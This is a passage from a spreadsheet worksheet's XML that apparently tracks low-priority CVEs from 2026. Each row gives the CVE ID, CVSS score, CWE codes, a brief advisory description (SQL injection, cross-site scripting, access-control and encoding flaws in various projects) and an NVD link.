          <t>GitHub CLI (gh) is GitHub's official command line tool. Versions 2.28.0 through 2.97.0 bind the local listener created by gh codespace ports forward to all available network interfaces by default. While port forwarding is active, a service in a Codespace can therefore become reachable through the user's non-loopback local IP addresses by other hosts that can route to the user's machine. This behavior does not change the GitHub-side visibility of the Codespaces port. Instead, it exposes the forwarded service through a wildcard-bound listener on the user's local machine, even when the source Codespaces port remains private. Exploitation requires a network-adjacent attacker to reach the victim's machine while forwarding is active. This issue is fixed in version 2.98.0.</t>
        </is>
      </c>
      <c r="M5946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72924</t>
        </is>
      </c>
    </row>
    <row r="5947">
      <c r="A5947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73427</t>
        </is>
      </c>
      <c r="C5947" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5947" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5947" s="5" t="inlineStr"/>
      <c r="F5947" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5947" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5947" s="5" t="inlineStr"/>
      <c r="I5947" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5947" s="5" t="inlineStr"/>
      <c r="K5947" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5947" s="5" t="inlineStr">
        <is>
          <t>Trix is a what-you-see-is-what-you-get rich text editor for everyday writing. Prior to 2.1.18, Trix is vulnerable to cross-site scripting when a crafted application/x-trix-document JSON payload is dropped into an editor using the fallback Level0InputController, such as an embedded WebView without Input Events Level 2 support. The StringPiece.fromJSON method trusts href attributes from the JSON payload without sanitization, allowing a draggable element containing a javascript: URI to bypass DOMPurify sanitization and inject executable JavaScript into the DOM. Exploitation requires the victim to drag and drop attacker-controlled content, and server-side HTML sanitization can neutralize the payload on save. This issue is fixed in version 2.1.18.</t>
        </is>
      </c>
      <c r="M5947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73427</t>
        </is>
      </c>
    </row>
    <row r="5948">
      <c r="A5948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81638</t>
        </is>
      </c>
      <c r="C5948" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5948" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5948" s="5" t="inlineStr"/>
      <c r="F5948" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5948" s="5" t="inlineStr"/>
      <c r="H5948" s="5" t="inlineStr"/>
      <c r="I5948" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5948" s="5" t="inlineStr"/>
      <c r="K5948" s="5" t="inlineStr">
        <is>
          <t>CWE-173</t>
        </is>
      </c>
      <c r="L5948" s="5" t="inlineStr">
        <is>
          <t>Improper Handling of Alternate Encoding vulnerability in ash-project ash_double_entry allows an attacker to submit several distinct string spellings of the same identifier.
AshDoubleEntry.ULID renders a 128-bit ULID as 26 Crockford base-32 characters, but the first character encodes only 3 bits, so canonical values are 0 to 7. decode/1 in lib/ulid.ex masks the first character to its low 3 bits and valid?/1 accepts all 32 characters in that position, so 0..., 8..., G... and R... decode to the identical 16-byte value and resolve to the same row. When the type is exposed as a public ID over an HTTP or API boundary, an attacker-supplied ID can be spelled differently from the record it actually reads or writes, desynchronizing or bypassing string-level checks such as idempotency and deduplication keys, deny-lists, audit correlation, or signatures computed over the submitted ID.
This issue affects ash_double_entry: from 0.1.0 before 1.0.19.</t>
        </is>
      </c>
      <c r="M5948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81638</t>
        </is>
      </c>
    </row>
    <row r="5949">
      <c r="A5949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82865</t>
        </is>
      </c>
      <c r="C5949" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5949" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5949" s="5" t="inlineStr"/>
      <c r="F5949" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5949" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5949" s="5" t="inlineStr"/>
      <c r="I5949" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5949" s="5" t="inlineStr"/>
      <c r="K5949" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5949" s="5" t="inlineStr">
        <is>
          <t>pdfme schemas before 5.5.10 contains a cross-site scripting vulnerability in the multiVariableText property panel that assigns unsanitized i18n label values to innerHTML. Attackers who control label overrides through options.labels can inject arbitrary JavaScript that executes when users open the Designer and select a multiVariableText field without variable placeholders.</t>
        </is>
      </c>
      <c r="M5949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82865</t>
        </is>
      </c>
    </row>
    <row r="5950">
      <c r="A5950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85458</t>
        </is>
      </c>
      <c r="C5950" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5950" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5950" s="5" t="inlineStr"/>
      <c r="F5950" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5950" s="5" t="inlineStr"/>
      <c r="H5950" s="5" t="inlineStr"/>
      <c r="I5950" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5950" s="5" t="inlineStr"/>
      <c r="K5950" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L5950" s="5" t="inlineStr">
        <is>
          <t>Divide-by-zero in Xpdf 4.06 (and earlier), when a glyph in a Type 3 font has a zero height.</t>
        </is>
      </c>
      <c r="M5950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85458</t>
        </is>
      </c>
    </row>
    <row r="5951">
      <c r="A5951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85513</t>
        </is>
      </c>
      <c r="C5951" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5951" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5951" s="5" t="inlineStr"/>
      <c r="F5951" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5951" s="5" t="inlineStr"/>
      <c r="H5951" s="5" t="inlineStr"/>
      <c r="I5951" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5951" s="5" t="inlineStr"/>
      <c r="K5951" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="L5951" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in StackStorm st2 up to 3.9.0. This issue affects the function assert_user_is_admin_if_user_query_param_is_provided of the file st2api/st2api/controllers/v1/actionexecutions.py of the component NoOp RBAC backend. This manipulation of the argument User causes improper privilege management. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. Prior advisory CVE-2022-44009 was reported as a follow-up on the same sink, but this issue is distinct: it needs no Jinja RBAC und affects default install with RBAC disabled. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85513</t>
        </is>
      </c>
    </row>
    <row r="5952">
      <c r="A5952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86163</t>
        </is>
      </c>
      <c r="C5952" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5952" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5952" s="5" t="inlineStr"/>
      <c r="F5952" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5952" s="5" t="inlineStr"/>
      <c r="H5952" s="5" t="inlineStr"/>
      <c r="I5952" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5952" s="5" t="inlineStr"/>
      <c r="K5952" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5952" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in itsourcecode Sales and Inventory System 1.0. This impacts an unknown function of the file /pages/pro_del.php. The manipulation of the argument ID leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M5952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86163</t>
        </is>
      </c>
    </row>
    <row r="5953">
      <c r="A5953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86164</t>
        </is>
      </c>
      <c r="C5953" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5953" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5953" s="5" t="inlineStr"/>
      <c r="F5953" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5953" s="5" t="inlineStr"/>
      <c r="H5953" s="5" t="inlineStr"/>
      <c r="I5953" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5953" s="5" t="inlineStr"/>
      <c r="K5953" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5953" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in itsourcecode Sales and Inventory System 1.0. Affected is an unknown function of the file /pages/trans_view.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="M5953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86164</t>
        </is>
      </c>
    </row>
    <row r="5954">
      <c r="A5954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86170</t>
        </is>
      </c>
      <c r="C5954" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5954" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5954" s="5" t="inlineStr"/>
      <c r="F5954" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5954" s="5" t="inlineStr"/>
      <c r="H5954" s="5" t="inlineStr"/>
      <c r="I5954" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5954" s="5" t="inlineStr"/>
      <c r="K5954" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5954" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in DefaultFuction CRM 1.0.0. The impacted element is an unknown function of the file /modules/orders/edit.php. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="M5954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86170</t>
        </is>
      </c>
    </row>
    <row r="5955">
      <c r="A5955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86171</t>
        </is>
      </c>
      <c r="C5955" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5955" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5955" s="5" t="inlineStr"/>
      <c r="F5955" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5955" s="5" t="inlineStr"/>
      <c r="H5955" s="5" t="inlineStr"/>
      <c r="I5955" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5955" s="5" t="inlineStr"/>
      <c r="K5955" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5955" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in DefaultFuction CRM 1.0.0. This affects an unknown function of the file /modules/orders/delete.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="M5955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86171</t>
        </is>
      </c>
    </row>
    <row r="5956">
      <c r="A5956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86172</t>
        </is>
      </c>
      <c r="C5956" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5956" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5956" s="5" t="inlineStr"/>
      <c r="F5956" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5956" s="5" t="inlineStr"/>
      <c r="H5956" s="5" t="inlineStr"/>
      <c r="I5956" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5956" s="5" t="inlineStr"/>
      <c r="K5956" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5956" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in DefaultFuction CRM 1.0.0. This impacts an unknown function of the file /modules/customers/delete.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M5956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86172</t>
        </is>
      </c>
    </row>
    <row r="5957">
      <c r="A5957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86182</t>
        </is>
      </c>
      <c r="C5957" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5957" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5957" s="5" t="inlineStr"/>
      <c r="F5957" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5957" s="5" t="inlineStr"/>
      <c r="H5957" s="5" t="inlineStr"/>
      <c r="I5957" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5957" s="5" t="inlineStr"/>
      <c r="K5957" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="L5957" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in diem-project diem up to 5.1.3. This affects the function executeCommand of the file dmAdminPlugin/modules/dmConsole/actions/actions.class.php of the component dmConsole. This manipulation of the argument dm_command causes cross-site request forgery. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86182</t>
        </is>
      </c>
    </row>
    <row r="5958">
      <c r="A5958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86212</t>
        </is>
      </c>
      <c r="C5958" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5958" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5958" s="5" t="inlineStr"/>
      <c r="F5958" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5958" s="5" t="inlineStr"/>
      <c r="H5958" s="5" t="inlineStr"/>
      <c r="I5958" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5958" s="5" t="inlineStr"/>
      <c r="K5958" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-285</t>
        </is>
      </c>
      <c r="L5958" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Open5GS 2.7.7/2.8.0. This vulnerability affects unknown code of the component AMF/MME. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 9468de94caed2fc940f4a23cbf734651896d0fde. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="M5958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86212</t>
        </is>
      </c>
    </row>
    <row r="5959">
      <c r="A5959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86215</t>
        </is>
      </c>
      <c r="C5959" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5959" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5959" s="5" t="inlineStr"/>
      <c r="F5959" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5959" s="5" t="inlineStr"/>
      <c r="H5959" s="5" t="inlineStr"/>
      <c r="I5959" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5959" s="5" t="inlineStr"/>
      <c r="K5959" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L5959" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Mstfakts College-Management-System. The affected element is an unknown function of the file Front-end/server.php of the component Logout Handler. Such manipulation of the argument log_out leads to session expiration. It is possible to launch the attack remotely. The exploit is publicly available and might be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86215</t>
        </is>
      </c>
    </row>
    <row r="5960">
      <c r="A5960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86216</t>
        </is>
      </c>
      <c r="C5960" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5960" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5960" s="5" t="inlineStr"/>
      <c r="F5960" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5960" s="5" t="inlineStr"/>
      <c r="H5960" s="5" t="inlineStr"/>
      <c r="I5960" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5960" s="5" t="inlineStr"/>
      <c r="K5960" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5960" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in code-projects Hotel and Tourism Reservation in PHP 1.0. This impacts an unknown function of the file /ht/details.php. The manipulation of the argument room leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="M5960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86216</t>
        </is>
      </c>
    </row>
    <row r="5961">
      <c r="A5961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86228</t>
        </is>
      </c>
      <c r="C5961" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5961" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5961" s="5" t="inlineStr"/>
      <c r="F5961" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5961" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5961" s="5" t="inlineStr"/>
      <c r="I5961" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5961" s="5" t="inlineStr"/>
      <c r="K5961" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="L5961" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in JeecgBoot up to 3.9.3. This vulnerability affects the function exportXls of the file jeecg-boot/jeecg-boot-module/jeecg-boot-module-airag/src/main/java/org/jeecg/modules/airag/llm/controller/AiragModelController.java. Such manipulation of the argument credential leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 3.9.5 is able to resolve this issue. The name of the patch is a2be896f753936956ee6863b632b8e5a0231345c. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="M5961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86228</t>
        </is>
      </c>
    </row>
    <row r="5962">
      <c r="A5962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86232</t>
        </is>
      </c>
      <c r="C5962" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5962" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5962" s="5" t="inlineStr"/>
      <c r="F5962" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5962" s="5" t="inlineStr"/>
      <c r="H5962" s="5" t="inlineStr"/>
      <c r="I5962" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5962" s="5" t="inlineStr"/>
      <c r="K5962" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5962" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in itsourcecode Sales and Inventory System 1.0. Affected by this vulnerability is an unknown functionality of the file /pages/sup_del.php?type=supplier. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="M5962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86232</t>
        </is>
      </c>
    </row>
    <row r="5963">
      <c r="A5963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86233</t>
        </is>
      </c>
      <c r="C5963" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5963" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5963" s="5" t="inlineStr"/>
      <c r="F5963" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5963" s="5" t="inlineStr"/>
      <c r="H5963" s="5" t="inlineStr"/>
      <c r="I5963" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5963" s="5" t="inlineStr"/>
      <c r="K5963" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5963" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in itsourcecode Sales and Inventory System 1.0. Affected by this issue is some unknown functionality of the file /pages/us_del.php?type=user. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="M5963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86233</t>
        </is>
      </c>
    </row>
    <row r="5964">
      <c r="A5964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86234</t>
        </is>
      </c>
      <c r="C5964" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5964" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5964" s="5" t="inlineStr"/>
      <c r="F5964" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5964" s="5" t="inlineStr"/>
      <c r="H5964" s="5" t="inlineStr"/>
      <c r="I5964" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5964" s="5" t="inlineStr"/>
      <c r="K5964" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5964" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Sales and Inventory System 1.0. This affects an unknown part of the file /pages/cust_transac.php?action=add. The manipulation of the argument firstname results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M5964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86234</t>
        </is>
      </c>
    </row>
    <row r="5965">
      <c r="A5965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86235</t>
        </is>
      </c>
      <c r="C5965" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5965" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5965" s="5" t="inlineStr"/>
      <c r="F5965" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5965" s="5" t="inlineStr"/>
      <c r="H5965" s="5" t="inlineStr"/>
      <c r="I5965" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5965" s="5" t="inlineStr"/>
      <c r="K5965" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5965" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. This vulnerability affects unknown code of the file /pages/pos_transac.php?action=add. This manipulation of the argument Customer causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M5965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86235</t>
        </is>
      </c>
    </row>
    <row r="5966">
      <c r="A5966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86236</t>
        </is>
      </c>
      <c r="C5966" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5966" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5966" s="5" t="inlineStr"/>
      <c r="F5966" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5966" s="5" t="inlineStr"/>
      <c r="H5966" s="5" t="inlineStr"/>
      <c r="I5966" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5966" s="5" t="inlineStr"/>
      <c r="K5966" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5966" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Sales and Inventory System 1.0. This issue affects some unknown processing of the file /pages/pro_transac.php?action=add. Such manipulation of the argument Name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M5966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86236</t>
        </is>
      </c>
    </row>
    <row r="5967">
      <c r="A5967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86238</t>
        </is>
      </c>
      <c r="C5967" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5967" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5967" s="5" t="inlineStr"/>
      <c r="F5967" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5967" s="5" t="inlineStr"/>
      <c r="H5967" s="5" t="inlineStr"/>
      <c r="I5967" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5967" s="5" t="inlineStr"/>
      <c r="K5967" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5967" s="5" t="inlineStr">
        <is>
